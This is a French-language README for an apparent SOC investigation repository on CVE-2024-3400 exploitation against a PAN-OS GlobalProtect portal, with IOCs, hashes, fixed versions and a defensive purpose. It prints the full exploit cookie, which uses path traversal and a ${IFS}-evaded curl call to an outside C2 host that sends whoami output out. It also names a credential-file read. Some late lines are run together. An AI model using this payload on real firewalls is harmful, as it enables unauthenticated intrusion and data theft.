
Stratégies de détection, d'analyse et de réponse pour les tentatives d'exploitation de CVE-2024-3400 ciblant les portails GlobalProtect de Palo Alto PAN-OS. Comprend des IOCs, des modèles d'exploitation et des conseils d'atténuation.
Détection, analyse et stratégies de réponse pour les tentatives d'exploitation de CVE-2024-3400 ciblant les portails GlobalProtect de Palo Alto PAN-OS. Inclut les IOC, les schémas d'exploitation et les conseils d'atténuation.
Ce dépôt contient une enquête détaillée et une analyse des menaces liées à CVE-2024-3400, une vulnérabilité critique d'injection de commande sans authentification affectant le logiciel Palo Alto Networks PAN-OS, ciblant spécifiquement le portail GlobalProtect.
Le 18 avril 2024, une activité d'exploitation a été détectée contre un pare-feu PAN-OS interne utilisant le point de terminaison vulnérable /global-protect/login.esp. L'attaquant a utilisé un cookie SESSID malveillant contenant une commande curl exécutée par backtick pour atteindre un serveur C2 distant hébergé à 144.172.79.92 (Miami, Floride). La charge utile de l'exploit a utilisé ${IFS} pour contourner les filtres simples et a exploité le répertoire de télémétrie de PAN-OS pour préparer l'activité malveillante. Le pare-feu a répondu par un 200 OK, indiquant que la charge utile a probablement été exécutée avec succès.

ID de l'événement : 249
Règle de détection : SOC274 – Exploitation d'injection de commande PAN-OS
Heure de l'événement : 18 avril 2024, 03:09 UTC
Nom d'hôte : PA-Firewall-01
IP de destination : 172.16.17.139
IP source : 144.172.79.92
Méthode de requête : POST
Point de terminaison : /global-protect/login.esp
Charge utile du cookie : SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)
Hachages malveillants :
SHA256 : 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
MD5 : 0c1554888ce9ed0da1583dbdf7b31651





SESSID pour l'injection de commande${IFS} pour l'évasion/opt/panlogs/tmp/device_telemetrydt_send après l'exploitation4444


10.2.9-h1, 11.0.4-h1, ou 11.1.2-h3144.172.79.92logs/ : Journaux de détection analysés et brutsioc/ : Hachages de fichiers et IP associés à l'attaqueanalysis/ : Analyse approfondie du comportement de l'exploit et traçage des processusreport/ : Résumé et images des journaux et codes de mes investigationsCVE-2024-3400 fait référence à une vulnérabilité critique dans Palo Alto Networks PAN-OS, affectant spécifiquement les passerelles GlobalProtect. Voici un résumé de ce qui est publiquement connu à ce sujet :
Score CVSS : 10.0 (Critique)
Publié : avril 2024
Produits concernés : PAN-OS 10.2, 11.0 et 11.1 lorsque GlobalProtect est activé.
Exploitation : confirmée dans la nature (zero-day)
Type de vulnérabilité : injection de commande sans authentification
CVE-2024-3400 permet à des attaquants non authentifiés d'exécuter des commandes arbitraires sur le système d'exploitation du pare-feu. Cela donne essentiellement un contrôle total sur les appareils affectés sans avoir besoin d'identifiants — un point de compromission sérieux pour toute entreprise utilisant des pare-feu Palo Alto.
show system processes, cat /etc/passwd, etc.).Ce dépôt sert à la fois de rapport d'investigation interne et de ressource pédagogique pour les défenseurs cherchant à comprendre l'exploitation réelle des vulnérabilités PAN-OS. Les contributions et observations supplémentaires sont les bienvenues.
Script malveillant : update.py (exécuté avec /usr/bin/python3)